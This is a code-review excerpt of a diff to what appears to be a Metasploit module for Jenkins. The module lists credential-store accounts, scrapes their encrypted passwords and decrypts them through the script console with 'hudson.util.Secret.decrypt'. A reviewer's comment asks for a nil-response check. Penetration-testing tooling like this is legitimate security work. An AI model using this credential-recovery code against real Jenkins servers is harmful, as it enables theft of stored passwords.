modules/auxiliary/gather/jenkins_cred_recovery.rb

```diff
@@ -0,0 +1,276 @@
+    # decryption API. So a version wouldn't be adequate to check.
+    if version
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+
+  # Returns all the found Jenkins accounts of a specific domain. The accounts collected only
+  # include the ones with the username-and-password kind. It does not include other kinds such
+  # as SSH, certificates, or other plugins.
+  #
+  # @return [Array<Hash>] An array of account data such as id, username, kind, description, and
+  #                       the domain it belongs to.
+  def get_users
+    users = []
+
+    uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain)
+    uri << '/'
+
+    res = send_request_cgi({ 'uri'=>uri })
+    html = res.get_html_document
+    rows = html.search('//table[@class="sortable pane bigtable"]//tr')
+
+    # The first row is the table header, which we don't want.
+    rows.shift
+
+    rows.each do |row|
+      td = row.search('td')
+      id = td[0].at('a').attributes['href'].value.scan(/^credential\/(.+)/).flatten.first || ''
+      name = td[1].text.scan(/^(.+)\/\*+/).flatten.first || ''
+      kind = td[2].text
+      desc = td[3].text
+      next unless /Username with password/i === kind
+
+      users << {
+        id:          id,
+        username:    name,
+        kind:        kind,
+        description: desc,
+        domain:      domain
+      }
+    end
+
+    users
+  end
+
+
+  # Returns the found encrypted password from the update page.
+  #
+  # @param id [String] The ID of a specific account.
+  #
+  # @return [String] Found encrypted password.
+  # @return [NilCass] No encrypted password found.
+  def get_encrypted_password(id)
+    uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain, 'credential', id, 'update')
+    res = send_request_cgi({ 'uri'=>uri })
+    html = res.get_html_document
+    input = html.at('//div[@id="main-panel"]//form//table//tr/td//input[@name="_.password"]')
+
+    if input
+      return input.attributes['value'].value
+    else
+      vprint_error("Unable to find encrypted password for #{id}")
+    end
+
+    nil
+  end
+
+
+  # Returns the decrypted password by using the script console.
+  #
+  # @param encrypted_pass [String] The encrypted password.
+  #
+  # @return [String] The decrypted password.
+  # @return [NilClass] No decrypted password found (no result found on the console)
+  def decrypt(encrypted_pass)
+    uri  = normalize_uri(target_uri, 'script')
+    res  = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => uri,
+      'vars_post' => {
+        'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'",
+        'json'   => {'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'"}.to_json,
+        'Submit' => 'Run'
+      }
+    })
+
+    if res && /javax\.servlet\.ServletException: hudson\.security\.AccessDeniedException2/ === res.body
```

Comment:
In order to ensure res.get_html_document call works at line 172, we can use unless res here:
```ruby
unless res
  fail_with(Failure::Unknown, 'No response received from the server')
end
if /javax\.servlet\.ServletException: hudson\.security\.AccessDeniedException2/ === res.body
  vprint_error('No permission to decrypt password')
  return nil
end
html = res.get_html_document
...
```